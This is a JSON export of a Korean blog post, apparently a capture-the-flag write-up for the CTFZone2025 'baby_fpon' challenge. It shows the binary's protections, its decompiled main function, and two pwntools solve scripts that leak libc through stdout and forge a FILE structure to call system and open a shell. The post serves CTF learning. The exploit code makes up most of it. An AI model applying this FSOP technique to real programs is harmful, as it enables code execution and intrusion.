{"id":3927,"date":"2025-08-18T11:06:55","date_gmt":"2025-08-18T02:06:55","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3927"},"modified":"2025-08-18T11:06:56","modified_gmt":"2025-08-18T02:06:56","slug":"ctfzone2025-baby_fpon-fsop","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3927","title":{"rendered":"[CTFZone2025] baby_fpon (FSOP)"},"content":{"rendered":"\n

checksec<\/h2>\n\n\n\n
ubuntu@735e623c0bf0:~\/study\/ctfzone2025\/fpon2$ checksec .\/fpon\n[*] '\/home\/ubuntu\/study\/ctfzone2025\/fpon2\/fpon'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    Stripped:   No\n<\/pre>\n\n\n\n
GOT Overwrite\uac00 \uac00\ub2a5\ud568.<\/p>\n\n\n\n
Analysis \/ Decompiled-src<\/h2>\n\n\n\n
main<\/h3>\n\n\n\n
libc\uc758 stdout \uc8fc\uc18c\uc5d0 \uc788\ub294 \ub370\uc774\ud130\ub97c \ubcc0\uc870\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
2\ubc14\uc774\ud2b8 \uc815\ub3c4 \uc218\uc815\uc774 \uac00\ub2a5\ud558\uba70, \uc774\ud6c4\uc5d0\ub294 \uc4f0\uc5ec\uc9c8 address\uc640 \uc4f8 \uac12\uc778 content\ub97c \uc81c\uacf5\ud574\uc900\ub2e4.<\/p>\n\n\n\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rdx\n  char v4; \/\/ al\n  _BYTE *v5; \/\/ rdx\n  __int64 v6; \/\/ rdx\n  unsigned __int8 user_uint8; \/\/ [rsp+Eh] [rbp-12h]\n  unsigned __int8 v9; \/\/ [rsp+Eh] [rbp-12h]\n  FILE *v10; \/\/ [rsp+10h] [rbp-10h]\n  void *buf; \/\/ [rsp+18h] [rbp-8h]\n\n  v10 = _bss_start;\n  user_uint8 = get_user_uint8(\"Offset: \", argv, envp);\n  v4 = get_user_uint8(\"Byte: \", argv, v3);\n  v5 = (char *)v10 + user_uint8;\n  *v5 = v4;\n  v9 = get_user_uint8(\"Offset: \", argv, v5);\n  *((_BYTE *)&v10->_flags + v9) = get_user_uint8(\"Byte: \", argv, v6);\n  buf = (void *)get_user_uint64(\"Address: \");\n  printf(\"Content: \");\n  read(0, buf, 0x1000u);\n  puts(\"That's all\");\n  return 0;\n}\n<\/pre>\n\n\n\n
Soluton<\/h2>\n\n\n\n
\uc774\uc804 LACTF2024\uc5d0\uc11c \ubcf4\uc558\ub358 flipma \ubb38\uc81c\uc5d0\uc11c stdout\uc744 2\ubc14\uc774\ud2b8 \uc218\uc815\ud574\uc11c \ub9ad\ud588\ub358 \uae30\uc5b5\uc774 \ub0ac\ub2e4.<\/p>\n\n\n\n
_IO_2_1_stdout_\u2192_flags\uc5d0 _IO_IS_APPENDING \ud50c\ub798\uadf8\uac00 \ucd94\uac00\uc2dc\ud0a4\uace0, _IO_2_1_stdout_\u2192_IO_write_base\uc5d0\uc11c \ud558\uc704 2\ubc88\uc9f8 \ubc14\uc774\ud2b8\ub97c \\x00\uc73c\ub85c \uc218\uc815\uc2dc\ud0a4\uba74,<\/p>\n\n\n\n
\ub300\ub7c9\uc758 libc \uad00\ub828 \uc8fc\uc18c\ub4e4\uc774 \ub9ad\ub41c\ub2e4.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\uc774\ud6c4\uc5d0\ub294 FSOP\uc73c\ub85c \uc258\ub530\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
solve.py<\/a><\/h2>\n\n\n\n
#!\/usr\/bin\/env python3\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = process(\".\/fpon\")\n# p = remote(\"host3.dreamhack.games\", 10296)\ne = ELF('.\/fpon',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef FSOP_struct(flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0,\\\\\n_IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0,\\\\\n_IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _markers= 0, _chain = 0, _fileno = 0,\\\\\n_flags2 = 0, _old_offset = 0, _cur_column = 0, _vtable_offset = 0, _shortbuf = 0, lock = 0,\\\\\n_offset = 0, _codecvt = 0, _wide_data = 0, _freeres_list = 0, _freeres_buf = 0,\\\\\n__pad5 = 0, _mode = 0, _unused2 = b\"\", vtable = 0, more_append = b\"\"):\n    \n    FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)\n    FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)\n    FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)\n    FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)\n    FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)\n    FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)\n    FSOP += p64(__pad5) + p32(_mode)\n    if _unused2 == b\"\":\n        FSOP += b\"\\\\x00\"*0x14\n    else:\n        FSOP += _unused2[0x0:0x14].ljust(0x14, b\"\\\\x00\")\n    \n    FSOP += p64(vtable)\n    FSOP += more_append\n    return FSOP\n\nsla(\"Offset: \", str(1))\n\nsla(\"Byte: \", str(0x38))\n\nsla(\"Offset: \", str(8*4+1))\n\nsla(\"Byte: \", str(0x00))\n\nrl()\nleak = ru(\"Address: \")\nleak = leak[-64:]\nleak = leak[28:28+6]\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\n\nlibc_base = leak - l.sym._IO_2_1_stdin_\ninfo(f\"libc_base: {hex(libc_base)}\")\nl.address = libc_base\n\nfs = FileStructure(0)\nmarker = u64(b'CAFEBABE')\nfs._IO_save_end = marker\n_IO_save_end_off = bytes(fs) .index(p64(marker))\n\nFSOP = FSOP_struct(flags = u64(b\"\\\\x01\\\\x01;sh;\\\\x00\\\\x00\"), \\\\\n                   lock            = l.symbols['_IO_2_1_stdout_'] + 0x10, \\\\\n                   _IO_read_ptr    = 0x0, \\\\\n                   _IO_write_base  = 0x0, \\\\\n                   _wide_data      = l.symbols['_IO_2_1_stdout_'] - 0x10, \\\\\n                   _unused2        = p64(l.symbols['system'])+ b\"\\\\x00\"*4 + p64(l.symbols['_IO_2_1_stdout_'] + _IO_save_end_off + 4), \\\\\n                   vtable          = l.symbols['_IO_wfile_jumps'] - 0x20, \\\\\n                   )\n\nsl(str(l.sym._IO_2_1_stdout_))\n\ninfo(f\"FSOP payload len: {len(FSOP)}\")  \n\nsla(b\"Content: \", bytes(FSOP))\n\npi()\n\n<\/pre>\n\n\n\n
solve.py<\/a> (server)<\/h2>\n\n\n\n
#!\/usr\/bin\/env python3\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\n# p = process(\".\/fpon\")\np = remote(\"baby_fpon.tasks.ctf.ad\", 32176)\n# p = remote(\"host3.dreamhack.games\", 10296)\ne = ELF('.\/fpon',checksec=False)\n# l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\nl = ELF('.\/libc_prob.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef FSOP_struct(flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0,\\\\\n_IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0,\\\\\n_IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _markers= 0, _chain = 0, _fileno = 0,\\\\\n_flags2 = 0, _old_offset = 0, _cur_column = 0, _vtable_offset = 0, _shortbuf = 0, lock = 0,\\\\\n_offset = 0, _codecvt = 0, _wide_data = 0, _freeres_list = 0, _freeres_buf = 0,\\\\\n__pad5 = 0, _mode = 0, _unused2 = b\"\", vtable = 0, more_append = b\"\"):\n    \n    FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)\n    FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)\n    FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)\n    FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)\n    FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)\n    FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)\n    FSOP += p64(__pad5) + p32(_mode)\n    if _unused2 == b\"\":\n        FSOP += b\"\\\\x00\"*0x14\n    else:\n        FSOP += _unused2[0x0:0x14].ljust(0x14, b\"\\\\x00\")\n    \n    FSOP += p64(vtable)\n    FSOP += more_append\n    return FSOP\n\nsla(\"Offset: \", str(1))\n\nsla(\"Byte: \", str(0x38))\n\nsla(\"Offset: \", str(8*4+1))\n\nsla(\"Byte: \", str(0x00))\n\nrl()\nleak = ru(\"Address: \")\nleak = leak[-64:]\nleak = leak[28:28+6]\nleak = uu64(leak)\ninfo(f\"leak: {hex(leak)}\")\n\nlibc_base = leak - l.sym._IO_2_1_stdin_\ninfo(f\"libc_base: {hex(libc_base)}\")\nl.address = libc_base\n\nfs = FileStructure(0)\nmarker = u64(b'CAFEBABE')\nfs._IO_save_end = marker\n_IO_save_end_off = bytes(fs) .index(p64(marker))\n\nFSOP = FSOP_struct(flags = u64(b\"\\\\x01\\\\x01;sh;\\\\x00\\\\x00\"), \\\\\n                   lock            = l.symbols['_IO_2_1_stdout_'] + 0x10, \\\\\n                   _IO_read_ptr    = 0x0, \\\\\n                   _IO_write_base  = 0x0, \\\\\n                   _wide_data      = l.symbols['_IO_2_1_stdout_'] - 0x10, \\\\\n                   _unused2        = p64(l.symbols['system'])+ b\"\\\\x00\"*4 + p64(l.symbols['_IO_2_1_stdout_'] + _IO_save_end_off + 4), \\\\\n                   vtable          = l.symbols['_IO_wfile_jumps'] - 0x20, \\\\\n                   )\n\nsl(str(l.sym._IO_2_1_stdout_))\n\ninfo(f\"FSOP payload len: {len(FSOP)}\")    \n\nsla(b\"Content: \", bytes(FSOP))\n\npi()\n\n<\/pre>\n\n\n\n
Result<\/h2>\n\n\n\n
\"\"<\/figure>\n","protected":false},"excerpt":{"rendered":"
checksec GOT Overwrite\uac00 \uac00\ub2a5\ud568. Analysis \/ Decompiled-src main libc\uc758 stdout \uc8fc\uc18c\uc5d0 \uc788\ub294 \ub370\uc774\ud130\ub97c \ubcc0\uc870\uc2dc\ud0ac \uc218 \uc788\ub2e4. 2\ubc14\uc774\ud2b8 \uc815\ub3c4 \uc218\uc815\uc774 \uac00\ub2a5\ud558\uba70, \uc774\ud6c4\uc5d0\ub294 \uc4f0\uc5ec\uc9c8 address\uc640 \uc4f8 \uac12\uc778 content\ub97c \uc81c\uacf5\ud574\uc900\ub2e4. Soluton \uc774\uc804 LACTF2024\uc5d0\uc11c \ubcf4\uc558\ub358 flipma \ubb38\uc81c\uc5d0\uc11c stdout\uc744 2\ubc14\uc774\ud2b8 \uc218\uc815\ud574\uc11c \ub9ad\ud588\ub358 \uae30\uc5b5\uc774 \ub0ac\ub2e4. _IO_2_1_stdout_\u2192_flags\uc5d0 _IO_IS_APPENDING \ud50c\ub798\uadf8\uac00 \ucd94\uac00\uc2dc\ud0a4\uace0, _IO_2_1_stdout_\u2192_IO_write_base\uc5d0\uc11c \ud558\uc704 2\ubc88\uc9f8 \ubc14\uc774\ud2b8\ub97c \\x00\uc73c\ub85c \uc218\uc815\uc2dc\ud0a4\uba74, \ub300\ub7c9\uc758 libc \uad00\ub828 \uc8fc\uc18c\ub4e4\uc774 \ub9ad\ub41c\ub2e4. \uc774\ud6c4\uc5d0\ub294… \ub354 \ubcf4\uae30 »[CTFZone2025] baby_fpon (FSOP)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[33,25],"class_list":["post-3927","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fsop","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3927","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3927"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3927\/revisions"}],"predecessor-version":[{"id":3930,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3927\/revisions\/3930"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3927"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3927"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3927"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}